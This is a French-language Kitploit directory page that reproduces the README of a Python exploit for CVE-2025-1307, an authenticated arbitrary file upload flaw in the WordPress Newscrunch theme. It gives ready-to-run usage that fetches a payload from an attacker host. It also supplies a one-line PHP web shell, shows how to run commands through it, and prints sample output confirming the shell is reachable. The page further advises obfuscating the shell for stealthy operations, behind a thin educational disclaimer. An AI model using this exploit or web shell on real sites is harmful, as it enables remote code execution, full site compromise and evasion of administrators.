Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-1307 — Newscrunch <= 1.8.4 - Téléchargement de fichier arbitraire authentifié (Subscriber+) | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-1307
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubnxploited/cve-2025-1307

CVE-2025-1307

Newscrunch <= 1.8.4 - Téléchargement de fichier arbitraire authentifié (Subscriber+)

Voir le dépôt
21il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit Newscrunch (CVE-2025-1307)

🚨 Vue d'ensemble

Cet exploit cible une vulnérabilité critique (CVE-2025-1307) dans le thème WordPress Newscrunch. La faille permet aux utilisateurs authentifiés (à partir du rôle Abonné) de téléverser des fichiers arbitraires en raison de l'absence de contrôles de capacités dans la fonction newscrunch_install_and_activate_plugin(). Cela peut conduire à une exécution de code à distance (RCE), compromettant complètement le site WordPress affecté.


🔥 Détails de la vulnérabilité

  • Identifiant CVE : CVE-2025-1307
  • Logiciel affecté : Thème WordPress Newscrunch (<= 1.8.4.1)
  • Classification CWE : CWE-862 - Autorisation manquante
  • Score CVSS : 9.8 (Critique)
  • Vecteur : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Date de publication : 4 mars 2025

🛑 Sévérité et impact

  • ✅ Exécution de code à distance (RCE)
  • ✅ Compromission totale du système
  • ✅ Téléversement de fichiers non autorisé
  • ✅ Risque d'élévation de privilèges

Exploitabilité : nécessite un compte WordPress valide avec des privilèges d'abonné ou supérieurs.


📜 Fonctionnalités du script

✅ Exploitation automatisée de CVE-2025-1307
✅ Détection automatique de la version vulnérable du thème
✅ Extraction et exécution automatiques de la charge utile ZIP
✅ Récupération dynamique du nom du fichier shell depuis le ZIP
✅ Vérification automatique de la disponibilité du shell après exploitation
✅ Journalisation claire et structurée pour le débogage


🚀 Comment l'utiliser

📌 Prérequis

Assurez-vous d'avoir Python 3.x installé et installez les dépendances requises :

root@kitploit:~
pip install requests urllib3 packaging

🔧 Exécution de l'exploit

root@kitploit:~
python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"

🔹 Utilisation

root@kitploit:~
Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -pl PAYLOAD_URL, --payload_url PAYLOAD_URL
                        Malicious file URL to upload

🛠️ Utilisation du shell téléversé

Une fois le shell téléversé avec succès, il permet l'exécution de commandes à distance sur le système cible. Le fichier shell doit être placé dans une archive ZIP ; il sera extrait automatiquement lors de l'exploitation.

🔹 Création de la charge utile ZIP

Assurez-vous que votre shell PHP (shell.php) se trouve dans une archive ZIP. Téléversez ensuite le fichier ZIP à l'aide de l'exploit.

root@kitploit:~
<?php system($_GET['cmd']); ?>

🔹 Exécution de commandes

Vous pouvez exécuter des commandes système via le navigateur en ajoutant le paramètre cmd à l'URL du shell :

root@kitploit:~
http://target/wp-content/plugins/shell.php?cmd=whoami

⚠️ Sécurisation du shell

  • Comme il s'agit d'un simple web shell, il ne dispose d'aucune authentification et doit être utilisé avec prudence.
  • S'il est détecté, il peut être facilement supprimé par les administrateurs.
  • Envisagez d'utiliser du code PHP obfusqué ou des shells protégés par mot de passe pour des opérations furtives.

🔹 Sortie attendue

root@kitploit:~
[+] Newscrunch theme version detected: 1.8.4
[+] Exploitation is possible, proceeding...
[*] Logging in...
[+] Logged in successfully.
[*] Uploading and extracting payload...
[+] Exploit executed successfully. Malicious file uploaded.
[*] Checking if shell is accessible: http://target/wp-content/plugins/U.php
[+] Shell successfully uploaded and accessible: http://target/wp-content/plugins/U.php?cmd=ls

⚠️ Avertissement

Cet outil est destiné uniquement à des fins éducatives et de recherche en sécurité. L'exploitation non autorisée de vulnérabilités est illégale et punie par la loi. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil. Utilisez-le de manière responsable.

Par : Nxploit | Khaled Alenazi

Télécharger l’outil